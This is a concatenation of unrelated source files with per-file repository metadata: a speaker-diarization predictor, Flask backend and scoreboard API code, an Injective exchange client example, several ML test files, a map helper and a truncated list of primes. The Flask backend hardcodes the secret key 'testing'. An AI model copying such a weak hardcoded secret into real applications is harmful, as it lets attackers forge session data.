onnx.export(self.model, mfcc, f"{outdir}/diarization.onnx", input_names=["input"], output_names=["output"])
print(f"model is exported as {outdir}/diarization.onnx")
class OpenVINOPredictor(BasePredictor):
def __init__(self, model_xml, model_bin, config_path, max_frame=45, hop=3):
super().__init__(config_path, max_frame, hop)
net = IENetwork(model_xml, model_bin)
plugin = IECore()
self.exec_net = plugin.load_network(net, "CPU")
def predict(self, path, plot=False):
y = self._load(path, mfcc=False)
activity = zcr_vad(y)
spans = get_timestamp(activity)
embed = [self._encode_segment(y, span) for span in spans]
embed = np.vstack(embed)
speakers = OptimizedAgglomerativeClustering().fit_predict(embed)
if plot:
self._plot_diarization(y, spans, speakers)
timestamp = np.array(spans) / self.sr
return timestamp, speakers
def _encode_segment(self, y, span):
start, end = span
mfcc = self._mfcc(y[:, start:end])
mfcc = mfcc.unfold(2, self.max_frame, self.hop).permute(2, 0, 1, 3)
mfcc = mfcc.cpu().numpy()
embed = [self.exec_net.infer({"input": m}) for m in mfcc]
embed = np.array([e["output"] for e in embed])
embed = embed.mean(0)
return embed
| 37.495327
| 115
| 0.618893
|
92d54e4279b29667ea19aae7d50c3ce8ccc31df3
| 446
|
py
|
Python
|
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | null | null | null |
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | 147
|
2021-10-14T18:10:04.000Z
|
2021-11-30T01:36:42.000Z
|
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | 8
|
2021-11-04T04:17:21.000Z
|
2021-11-26T12:53:52.000Z
|
# pylint: skip-file
# pylint: disable=pointless-string-statement,undefined-variable,line-too-long
from flask import Flask
from os import environ
from flask_cors import CORS
app = Flask(__name__)
from auth_controller import *
from products import *
from product_controller import *
from db_init import db
app.secret_key = "testing"
CORS(app)
#if __name__ == "__main__":
# app.run(debug=True, port=environ.get("PORT", 5000) , host='0.0.0.0')
| 24.777778
| 77
| 0.757848
|
b84a54dbc9057222f394b75fe104cfd15c74574b
| 2,710
|
py
|
Python
|
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | null | null | null |
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | 40
|
2020-02-18T23:31:17.000Z
|
2021-03-04T19:45:17.000Z
|
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | null | null | null |
import re
from flask_restful import Resource, reqparse
from models import Scoreboard
from views import DBSession, get_rankings
from sqlalchemy.orm.exc import NoResultFound
# Username legality check: 4-50 characters (letters, digits, '.', '_', '-')
USERNAME_REGEX = re.compile('^[a-zA-Z0-9._-]{4,50}$')
# accept and parse POST
score_parser = reqparse.RequestParser()
score_parser.add_argument('username',
help='Your username should contain 4-50 '
                               'characters: letters, digits, ".", "_" or "-".',
required=True)
score_parser.add_argument('score',
help='This field is required', required=True)
# Score API
class PublishScore(Resource):
    # GET: get the top ten
def get(self):
top_ten = dict()
# find all users, sorted by score
board = DBSession.query(Scoreboard).order_by(Scoreboard.score.desc()).all()
        # find the top ten users if there are more than 10 users
if len(board) > 10:
for i in range(10):
# result contains username, score, ranking (handles ties)
top_ten[i] = self.build_user_data_json(board, i)
# otherwise find all users
else:
for i in range(len(board)):
# result contains username, score, ranking (handles ties)
top_ten[i] = self.build_user_data_json(board, i)
# close DB session
DBSession.close()
return top_ten, 200
# POST: submit score
def post(self):
data = score_parser.parse_args()
# Find if user already exists
try:
user_data = DBSession.query(Scoreboard).\
filter_by(username=data['username']).one()
# If the user's score in database is lower, update score
if user_data.score < int(data['score']):
                user_data.score = int(data['score'])  # store as int, matching the comparison above
# If user doesn't exist, create user and save score
except NoResultFound:
user_data = Scoreboard(username=data['username'],
score=int(data['score']))
DBSession.add(user_data)
# Commit change to DB
DBSession.commit()
# Find current ranking
board = DBSession.query(Scoreboard).order_by(Scoreboard.score.desc()).all()
# find index of user
index = board.index(user_data)
# close DB session
DBSession.close()
return self.build_user_data_json(board, index), 201
def build_user_data_json(self, board, i):
return {'username': board[i].username,
'score': board[i].score,
'ranking': get_rankings(board)[i]
}
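For context, a minimal sketch of how this resource might be wired into a Flask app with flask_restful; the '/api/score' route name is a hypothetical choice, not taken from this repo:
from flask import Flask
from flask_restful import Api

app = Flask(__name__)
api = Api(app)
# GET -> top ten scores, POST -> submit a score
api.add_resource(PublishScore, '/api/score')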
| 38.169014
| 83
| 0.595203
|
0f63c792b7cf95a34167dc6b89da09c94c825a62
| 1,290
|
py
|
Python
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 10
|
2021-09-07T08:03:52.000Z
|
2022-03-08T08:39:30.000Z
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.client import Client
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = Client(network, insecure=False)
market_id = "0x4ca0f92fc28be0c9761326016b5a1a2177dd6375558365116b5bdda9abc229ce"
subaccount_id = "0xc6fe5d33615a1c52c08018c47e8bc53646a0e101000000000000000000000000"
trades = client.get_derivative_trades(
market_id=market_id,
subaccount_id=subaccount_id
)
print(trades)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
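As an aside, on Python 3.7+ the same entrypoint is usually written with asyncio.run, which replaces the get_event_loop pattern used above; a minimal alternative sketch:
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    asyncio.run(main())  # creates and closes the event loop itself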
| 34.864865
| 88
| 0.766667
|
8baf83e3ab6b47b8a0055b8559611b793be935db
| 594
|
py
|
Python
|
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | 8
|
2019-02-12T23:39:58.000Z
|
2021-08-11T22:30:59.000Z
|
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | null | null | null |
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | null | null | null |
from munch import Munch
from pathlib import Path
MOUNT_HEADERS = Munch({
"BTRFSROOT_TARGET": 'broot',
"UUID": "uuid",
"PARTUUID": "puuid",
"TYPE": "type",
"AUTO": "auto",
"SUBVOL": "subvol",
"TARGET": "mountpoint",
"OPTIONS": "options",
"UDISKS_TARGET": "udisks2"
})
BASE_PATHS = Munch({})
BASE_PATHS.run = Path('/run/mount')
BASE_PATHS.base = BASE_PATHS.run.joinpath('butter_hop')
BASE_PATHS.dlinks = BASE_PATHS.base.joinpath("distros")
BASE_PATHS.root = BASE_PATHS.run.joinpath("butter_realroot")
BASE_PATHS.distros = BASE_PATHS.root.joinpath("distros")
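Munch supports both attribute and key access, so downstream code can mix styles; a small usage sketch (the 'fedora' subvolume name is a hypothetical example):
# attribute access and dict access are interchangeable on a Munch
assert MOUNT_HEADERS.UUID == MOUNT_HEADERS["UUID"] == "uuid"
# derive a per-distro mount point under the shared base
distro_root = BASE_PATHS.distros.joinpath("fedora")
print(distro_root)  # /run/mount/butter_realroot/distros/fedora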
| 27
| 60
| 0.681818
|
f55bc8b945b6af8e21ca1ca1ddbf407188ab2b1e
| 797
|
py
|
Python
|
ServidorPython/python32_web/Lib/site-packages/sklearn/utils/tests/test_show_versions.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 25
|
2019-03-08T01:03:03.000Z
|
2022-02-14T17:38:32.000Z
|
venv/lib/python3.7/site-packages/sklearn/utils/tests/test_show_versions.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
venv/lib/python3.7/site-packages/sklearn/utils/tests/test_show_versions.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
from sklearn.utils._show_versions import _get_sys_info
from sklearn.utils._show_versions import _get_deps_info
from sklearn.utils._show_versions import show_versions
def test_get_sys_info():
sys_info = _get_sys_info()
assert 'python' in sys_info
assert 'executable' in sys_info
assert 'machine' in sys_info
def test_get_deps_info():
deps_info = _get_deps_info()
assert 'pip' in deps_info
assert 'setuptools' in deps_info
assert 'sklearn' in deps_info
assert 'numpy' in deps_info
assert 'scipy' in deps_info
assert 'Cython' in deps_info
assert 'pandas' in deps_info
def test_show_versions_with_blas(capsys):
show_versions()
out, err = capsys.readouterr()
assert 'python' in out
assert 'numpy' in out
assert 'BLAS' in out
| 24.151515
| 55
| 0.734003
|
90388d161204584ad978af006898cacebcf8d4a6
| 1,252
|
py
|
Python
|
tensor2tensor/rl/model_rl_experiment_test.py
|
repoloper/tensor2tensor
|
2fd91d34b8e6d79599c0612e446175174e838b9d
|
[
"Apache-2.0"
] | 61
|
2018-06-23T01:40:58.000Z
|
2021-06-07T09:33:38.000Z
|
tensor2tensor/rl/model_rl_experiment_test.py
|
zhaopufeng/tensor2tensor
|
7bb67a18e1e4a0cddd1d61c65c937f14c1c124e3
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/rl/model_rl_experiment_test.py
|
zhaopufeng/tensor2tensor
|
7bb67a18e1e4a0cddd1d61c65c937f14c1c124e3
|
[
"Apache-2.0"
] | 8
|
2018-10-23T13:10:12.000Z
|
2019-07-31T05:53:08.000Z
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tiny run of model_rl_experiment. Smoke test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.rl import model_rl_experiment
import tensorflow as tf
FLAGS = tf.flags.FLAGS
class ModelRLExperimentTest(tf.test.TestCase):
def test_basic(self):
FLAGS.output_dir = tf.test.get_temp_dir()
FLAGS.loop_hparams_set = "rl_modelrl_tiny"
FLAGS.loop_hparams = "generative_model_params=next_frame_tiny"
FLAGS.schedule = "train" # skip evaluation for world model training
model_rl_experiment.main(None)
if __name__ == "__main__":
tf.test.main()
| 32.102564
| 74
| 0.771565
|
f0390f8ed8e8b2d3e4a3ef576330872cea08f7d6
| 230
|
py
|
Python
|
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | 2
|
2018-01-05T08:09:37.000Z
|
2018-01-05T20:39:18.000Z
|
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | null | null | null |
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | null | null | null |
# carves a vertical line downward on a map: clears blocked tiles from
# (x, y) until the first open tile or the bottom edge of the map
import variables as var
def vline_down(map, x, y):
    # note: `map` shadows the builtin; kept for consistency with the tutorial
    while y < var.MAP_HEIGHT and map[x][y].blocked:
        map[x][y].blocked = False
        map[x][y].block_sight = False
        y += 1
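A self-contained sketch of how this helper might be exercised with a stub tile grid; the Tile class and the 5x5 grid are hypothetical, and var.MAP_HEIGHT is assumed to equal 5 here:
class Tile:  # hypothetical stand-in for the tutorial's map tile
    def __init__(self, blocked=True):
        self.blocked = blocked
        self.block_sight = blocked

grid = [[Tile() for _ in range(5)] for _ in range(5)]  # indexed as grid[x][y]
vline_down(grid, 2, 0)  # carves column x=2 open from the top edge downward
assert not grid[2][0].blocked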
| 23
| 51
| 0.608696
|
add0da64d20442dd1dd862e69dff6b881461037b
| 2,057
|
py
|
Python
|
tests/run/test_train.py
|
cosmoquester/speech-recognition
|
c9f137a7fe23548435d7f20d87b60522697218b5
|
[
"Apache-2.0"
] | 6
|
2021-05-06T10:14:19.000Z
|
2022-03-03T19:30:50.000Z
|
tests/run/test_train.py
|
ModuASR/speech-recognition
|
81bcf274407377dd785d204f5622c8747c33ea0f
|
[
"Apache-2.0"
] | 14
|
2021-05-02T08:21:18.000Z
|
2021-06-13T11:37:24.000Z
|
tests/run/test_train.py
|
cosmoquester/speech-recognition
|
c9f137a7fe23548435d7f20d87b60522697218b5
|
[
"Apache-2.0"
] | 2
|
2021-05-04T13:46:13.000Z
|
2021-05-12T07:29:06.000Z
|
import os
import random
import tempfile
import pytest
from speech_recognition.configs import TrainConfig
from speech_recognition.run.train import main, parser
from ..const import (
DEFAULT_LIBRI_CONFIG,
SP_MODEL_LIBRI,
TEST_DS_CONFIG,
TEST_LAS_CONFIG,
TFRECORD_DATASET_PATH,
WAV_DATASET_PATH,
)
@pytest.mark.interferable
@pytest.mark.parametrize("mixed_precision", [False, True])
@pytest.mark.parametrize("model_config_path", [TEST_LAS_CONFIG, TEST_DS_CONFIG])
def test_train(model_config_path, mixed_precision):
max_over_policy = random.choice([None, "slice", "filter"])
use_tfrecord = random.choice([True, False])
with tempfile.TemporaryDirectory() as tmpdir:
arguments = [
"--data-config",
DEFAULT_LIBRI_CONFIG,
"--model-config",
model_config_path,
"--sp-model-path",
SP_MODEL_LIBRI,
"--train-dataset-paths",
TFRECORD_DATASET_PATH if use_tfrecord else WAV_DATASET_PATH,
"--dev-dataset-paths",
TFRECORD_DATASET_PATH if use_tfrecord else WAV_DATASET_PATH,
"--output-path",
tmpdir,
"--steps-per-epoch",
"2",
"--epochs",
"1",
"--shuffle-buffer-size",
"30",
"--device",
"CPU",
"--batch-size",
"2",
"--dev-batch-size",
"2",
"--learning-rate",
"1e-3",
"--train-dataset-size",
"1",
]
if mixed_precision:
arguments.append("--mixed-precision")
if use_tfrecord:
arguments.append("--use-tfrecord")
if max_over_policy is not None:
arguments.extend(["--max-over-policy", max_over_policy])
assert main(TrainConfig(**vars(parser.parse_args(arguments)))) is None
assert os.path.exists(os.path.join(tmpdir, "logs", "train"))
assert os.path.exists(os.path.join(tmpdir, "models", "checkpoint"))
| 30.25
| 80
| 0.584832
|
46b45a4f0ec35e909f04c07cf661933aced73c0a
| 57,480
|
py
|
Python
|
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
primes = [2,3,5,7,11,13,17,19,23,29,31,37,41,43,47,53,59,61,67,71,73,79,83,89,97,101,103,107,109,113,127,131,137,139,149,151,157,163,167,173,179,181,191,193,197,199,211,223,227,229,233,239,241,251,257,263,269,271,277,281,283,293,307,311,313,317,331,337,347,349,353,359,367,373,379,383,389,397,401,409,419,421,431,433,439,443,449,457,461,463,467,479,487,491,499,503,509,521,523,541,547,557,563,569,571,577,587,593,599,601,607,613,617,619,631,641,643,647,653,659,661,673,677,683,691,701,709,719,727,733,739,743,751,757,761,769,773,787,797,809,811,821,823,827,829,839,853,857,859,863,877,881,883,887,907,911,919,929,937,941,947,953,967,971,977,983,991,997,1009,1013,1019,1021,1031,1033,1039,1049,1051,1061,1063,1069,1087,1091,1093,1097,1103,1109,1117,1123,1129,1151,1153,1163,1171,1181,1187,1193,1201,1213,1217,1223,1229,1231,1237,1249,1259,1277,1279,1283,1289,1291,1297,1301,1303,1307,1319,1321,1327,1361,1367,1373,1381,1399,1409,1423,1427,1429,1433,1439,1447,1451,1453,1459,1471,1481,1483,1487,1489,1493,1499,1511,1523,1531,1543,1549,1553,1559,1567,1571,1579,1583,1597,1601,1607,1609,1613,1619,1621,1627,1637,1657,1663,1667,1669,1693,1697,1699,1709,1721,1723,1733,1741,1747,1753,1759,1777,1783,1787,1789,1801,1811,1823,1831,1847,1861,1867,1871,1873,1877,1879,1889,1901,1907,1913,1931,1933,1949,1951,1973,1979,1987,1993,1997,1999,2003,2011,2017,2027,2029,2039,2053,2063,2069,2081,2083,2087,2089,2099,2111,2113,2129,2131,2137,2141,2143,2153,2161,2179,2203,2207,2213,2221,2237,2239,2243,2251,2267,2269,2273,2281,2287,2293,2297,2309,2311,2333,2339,2341,2347,2351,2357,2371,2377,2381,2383,2389,2393,2399,2411,2417,2423,2437,2441,2447,2459,2467,2473,2477,2503,2521,2531,2539,2543,2549,2551,2557,2579,2591,2593,2609,2617,2621,2633,2647,2657,2659,2663,2671,2677,2683,2687,2689,2693,2699,2707,2711,2713,2719,2729,2731,2741,2749,2753,2767,2777,2789,2791,2797,2801,2803,2819,2833,2837,2843,2851,2857,2861,2879,2887,2897,2903,2909,2917,2927,2939,2953,2957,2963,2969,2971,2999,3001,3011,3019,3023,3037,3041,3049,3061,3067,3079,3083,3089,3109,3119,3121,3137,3163,3167,3169,3181,3187,3191,3203,3209,3217,3221,3229,3251,3253,3257,3259,3271,3299,3301,3307,3313,3319,3323,3329,3331,3343,3347,3359,3361,3371,3373,3389,3391,3407,3413,3433,3449,3457,3461,3463,3467,3469,3491,3499,3511,3517,3527,3529,3533,3539,3541,3547,3557,3559,3571,3581,3583,3593,3607,3613,3617,3623,3631,3637,3643,3659,3671,3673,3677,3691,3697,3701,3709,3719,3727,3733,3739,3761,3767,3769,3779,3793,3797,3803,3821,3823,3833,3847,3851,3853,3863,3877,3881,3889,3907,3911,3917,3919,3923,3929,3931,3943,3947,3967,3989,4001,4003,4007,4013,4019,4021,4027,4049,4051,4057,4073,4079,4091,4093,4099,4111,4127,4129,4133,4139,4153,4157,4159,4177,4201,4211,4217,4219,4229,4231,4241,4243,4253,4259,4261,4271,4273,4283,4289,4297,4327,4337,4339,4349,4357,4363,4373,4391,4397,4409,4421,4423,4441,4447,4451,4457,4463,4481,4483,4493,4507,4513,4517,4519,4523,4547,4549,4561,4567,4583,4591,4597,4603,4621,4637,4639,4643,4649,4651,4657,4663,4673,4679,4691,4703,4721,4723,4729,4733,4751,4759,4783,4787,4789,4793,4799,4801,4813,4817,4831,4861,4871,4877,4889,4903,4909,4919,4931,4933,4937,4943,4951,4957,4967,4969,4973,4987,4993,4999,5003,5009,5011,5021,5023,5039,5051,5059,5077,5081,5087,5099,5101,5107,5113,5119,5147,5153,5167,5171,5179,5189,5197,5209,5227,5231,5233,5237,5261,5273,5279,5281,5297,5303,5309,5323,5333,5347,5351,5381,5387,5393,5399,5407,5413,5417,5419,5431,5437,5441,5443,5449,5471,5477,5479,5483,5501,5503,5507,5519,5521,5527,5531,5557,5563,5569,5573,5581,5591,5623,5639,5641,5647,5651,5653,5657,5659,5669,5683,56
89,5693,5701,5711,5717,5737,5741,5743,5749,5779,5783,5791,5801,5807,5813,5821,5827,5839,5843,5849,5851,5857,5861,5867,5869,5879,5881,5897,5903,5923,5927,5939,5953,5981,5987,6007,6011,6029,6037,6043,6047,6053,6067,6073,6079,6089,6091,6101,6113,6121,6131,6133,6143,6151,6163,6173,6197,6199,6203,6211,6217,6221,6229,6247,6257,6263,6269,6271,6277,6287,6299,6301,6311,6317,6323,6329,6337,6343,6353,6359,6361,6367,6373,6379,6389,6397,6421,6427,6449,6451,6469,6473,6481,6491,6521,6529,6547,6551,6553,6563,6569,6571,6577,6581,6599,6607,6619,6637,6653,6659,6661,6673,6679,6689,6691,6701,6703,6709,6719,6733,6737,6761,6763,6779,6781,6791,6793,6803,6823,6827,6829,6833,6841,6857,6863,6869,6871,6883,6899,6907,6911,6917,6947,6949,6959,6961,6967,6971,6977,6983,6991,6997,7001,7013,7019,7027,7039,7043,7057,7069,7079,7103,7109,7121,7127,7129,7151,7159,7177,7187,7193,7207,7211,7213,7219,7229,7237,7243,7247,7253,7283,7297,7307,7309,7321,7331,7333,7349,7351,7369,7393,7411,7417,7433,7451,7457,7459,7477,7481,7487,7489,7499,7507,7517,7523,7529,7537,7541,7547,7549,7559,7561,7573,7577,7583,7589,7591,7603,7607,7621,7639,7643,7649,7669,7673,7681,7687,7691,7699,7703,7717,7723,7727,7741,7753,7757,7759,7789,7793,7817,7823,7829,7841,7853,7867,7873,7877,7879,7883,7901,7907,7919,7927,7933,7937,7949,7951,7963,7993,8009,8011,8017,8039,8053,8059,8069,8081,8087,8089,8093,8101,8111,8117,8123,8147,8161,8167,8171,8179,8191,8209,8219,8221,8231,8233,8237,8243,8263,8269,8273,8287,8291,8293,8297,8311,8317,8329,8353,8363,8369,8377,8387,8389,8419,8423,8429,8431,8443,8447,8461,8467,8501,8513,8521,8527,8537,8539,8543,8563,8573,8581,8597,8599,8609,8623,8627,8629,8641,8647,8663,8669,8677,8681,8689,8693,8699,8707,8713,8719,8731,8737,8741,8747,8753,8761,8779,8783,8803,8807,8819,8821,8831,8837,8839,8849,8861,8863,8867,8887,8893,8923,8929,8933,8941,8951,8963,8969,8971,8999,9001,9007,9011,9013,9029,9041,9043,9049,9059,9067,9091,9103,9109,9127,9133,9137,9151,9157,9161,9173,9181,9187,9199,9203,9209,9221,9227,9239,9241,9257,9277,9281,9283,9293,9311,9319,9323,9337,9341,9343,9349,9371,9377,9391,9397,9403,9413,9419,9421,9431,9433,9437,9439,9461,9463,9467,9473,9479,9491,9497,9511,9521,9533,9539,9547,9551,9587,9601,9613,9619,9623,9629,9631,9643,9649,9661,9677,9679,9689,9697,9719,9721,9733,9739,9743,9749,9767,9769,9781,9787,9791,9803,9811,9817,9829,9833,9839,9851,9857,9859,9871,9883,9887,9901,9907,9923,9929,9931,9941,9949,9967,9973,10007,10009,10037,10039,10061,10067,10069,10079,10091,10093,10099,10103,10111,10133,10139,10141,10151,10159,10163,10169,10177,10181,10193,10211,10223,10243,10247,10253,10259,10267,10271,10273,10289,10301,10303,10313,10321,10331,10333,10337,10343,10357,10369,10391,10399,10427,10429,10433,10453,10457,10459,10463,10477,10487,10499,10501,10513,10529,10531,10559,10567,10589,10597,10601,10607,10613,10627,10631,10639,10651,10657,10663,10667,10687,10691,10709,10711,10723,10729,10733,10739,10753,10771,10781,10789,10799,10831,10837,10847,10853,10859,10861,10867,10883,10889,10891,10903,10909,10937,10939,10949,10957,10973,10979,10987,10993,11003,11027,11047,11057,11059,11069,11071,11083,11087,11093,11113,11117,11119,11131,11149,11159,11161,11171,11173,11177,11197,11213,11239,11243,11251,11257,11261,11273,11279,11287,11299,11311,11317,11321,11329,11351,11353,11369,11383,11393,11399,11411,11423,11437,11443,11447,11467,11471,11483,11489,11491,11497,11503,11519,11527,11549,11551,11579,11587,11593,11597,11617,11621,11633,11657,11677,11681,11689,11699,11701,11717,11719,11731,11743,11777,11779,11783,11789,11801,11807,11813,11821,11827,11831,11833,11839,
11863,11867,11887,11897,11903,11909,11923,11927,11933,11939,11941,11953,11959,11969,11971,11981,11987,12007,12011,12037,12041,12043,12049,12071,12073,12097,12101,12107,12109,12113,12119,12143,12149,12157,12161,12163,12197,12203,12211,12227,12239,12241,12251,12253,12263,12269,12277,12281,12289,12301,12323,12329,12343,12347,12373,12377,12379,12391,12401,12409,12413,12421,12433,12437,12451,12457,12473,12479,12487,12491,12497,12503,12511,12517,12527,12539,12541,12547,12553,12569,12577,12583,12589,12601,12611,12613,12619,12637,12641,12647,12653,12659,12671,12689,12697,12703,12713,12721,12739,12743,12757,12763,12781,12791,12799,12809,12821,12823,12829,12841,12853,12889,12893,12899,12907,12911,12917,12919,12923,12941,12953,12959,12967,12973,12979,12983,13001,13003,13007,13009,13033,13037,13043,13049,13063,13093,13099,13103,13109,13121,13127,13147,13151,13159,13163,13171,13177,13183,13187,13217,13219,13229,13241,13249,13259,13267,13291,13297,13309,13313,13327,13331,13337,13339,13367,13381,13397,13399,13411,13417,13421,13441,13451,13457,13463,13469,13477,13487,13499,13513,13523,13537,13553,13567,13577,13591,13597,13613,13619,13627,13633,13649,13669,13679,13681,13687,13691,13693,13697,13709,13711,13721,13723,13729,13751,13757,13759,13763,13781,13789,13799,13807,13829,13831,13841,13859,13873,13877,13879,13883,13901,13903,13907,13913,13921,13931,13933,13963,13967,13997,13999,14009,14011,14029,14033,14051,14057,14071,14081,14083,14087,14107,14143,14149,14153,14159,14173,14177,14197,14207,14221,14243,14249,14251,14281,14293,14303,14321,14323,14327,14341,14347,14369,14387,14389,14401,14407,14411,14419,14423,14431,14437,14447,14449,14461,14479,14489,14503,14519,14533,14537,14543,14549,14551,14557,14561,14563,14591,14593,14621,14627,14629,14633,14639,14653,14657,14669,14683,14699,14713,14717,14723,14731,14737,14741,14747,14753,14759,14767,14771,14779,14783,14797,14813,14821,14827,14831,14843,14851,14867,14869,14879,14887,14891,14897,14923,14929,14939,14947,14951,14957,14969,14983,15013,15017,15031,15053,15061,15073,15077,15083,15091,15101,15107,15121,15131,15137,15139,15149,15161,15173,15187,15193,15199,15217,15227,15233,15241,15259,15263,15269,15271,15277,15287,15289,15299,15307,15313,15319,15329,15331,15349,15359,15361,15373,15377,15383,15391,15401,15413,15427,15439,15443,15451,15461,15467,15473,15493,15497,15511,15527,15541,15551,15559,15569,15581,15583,15601,15607,15619,15629,15641,15643,15647,15649,15661,15667,15671,15679,15683,15727,15731,15733,15737,15739,15749,15761,15767,15773,15787,15791,15797,15803,15809,15817,15823,15859,15877,15881,15887,15889,15901,15907,15913,15919,15923,15937,15959,15971,15973,15991,16001,16007,16033,16057,16061,16063,16067,16069,16073,16087,16091,16097,16103,16111,16127,16139,16141,16183,16187,16189,16193,16217,16223,16229,16231,16249,16253,16267,16273,16301,16319,16333,16339,16349,16361,16363,16369,16381,16411,16417,16421,16427,16433,16447,16451,16453,16477,16481,16487,16493,16519,16529,16547,16553,16561,16567,16573,16603,16607,16619,16631,16633,16649,16651,16657,16661,16673,16691,16693,16699,16703,16729,16741,16747,16759,16763,16787,16811,16823,16829,16831,16843,16871,16879,16883,16889,16901,16903,16921,16927,16931,16937,16943,16963,16979,16981,16987,16993,17011,17021,17027,17029,17033,17041,17047,17053,17077,17093,17099,17107,17117,17123,17137,17159,17167,17183,17189,17191,17203,17207,17209,17231,17239,17257,17291,17293,17299,17317,17321,17327,17333,17341,17351,17359,17377,17383,17387,17389,17393,17401,17417,17419,17431,17443,17449,17467,17471,17477,17483,17489,17491,174
97,17509,17519,17539,17551,17569,17573,17579,17581,17597,17599,17609,17623,17627,17657,17659,17669,17681,17683,17707,17713,17729,17737,17747,17749,17761,17783,17789,17791,17807,17827,17837,17839,17851,17863,17881,17891,17903,17909,17911,17921,17923,17929,17939,17957,17959,17971,17977,17981,17987,17989,18013,18041,18043,18047,18049,18059,18061,18077,18089,18097,18119,18121,18127,18131,18133,18143,18149,18169,18181,18191,18199,18211,18217,18223,18229,18233,18251,18253,18257,18269,18287,18289,18301,18307,18311,18313,18329,18341,18353,18367,18371,18379,18397,18401,18413,18427,18433,18439,18443,18451,18457,18461,18481,18493,18503,18517,18521,18523,18539,18541,18553,18583,18587,18593,18617,18637,18661,18671,18679,18691,18701,18713,18719,18731,18743,18749,18757,18773,18787,18793,18797,18803,18839,18859,18869,18899,18911,18913,18917,18919,18947,18959,18973,18979,19001,19009,19013,19031,19037,19051,19069,19073,19079,19081,19087,19121,19139,19141,19157,19163,19181,19183,19207,19211,19213,19219,19231,19237,19249,19259,19267,19273,19289,19301,19309,19319,19333,19373,19379,19381,19387,19391,19403,19417,19421,19423,19427,19429,19433,19441,19447,19457,19463,19469,19471,19477,19483,19489,19501,19507,19531,19541,19543,19553,19559,19571,19577,19583,19597,19603,19609,19661,19681,19687,19697,19699,19709,19717,19727,19739,19751,19753,19759,19763,19777,19793,19801,19813,19819,19841,19843,19853,19861,19867,19889,19891,19913,19919,19927,19937,19949,19961,19963,19973,19979,19991,19993,19997,20011,20021,20023,20029,20047,20051,20063,20071,20089,20101,20107,20113,20117,20123,20129,20143,20147,20149,20161,20173,20177,20183,20201,20219,20231,20233,20249,20261,20269,20287,20297,20323,20327,20333,20341,20347,20353,20357,20359,20369,20389,2039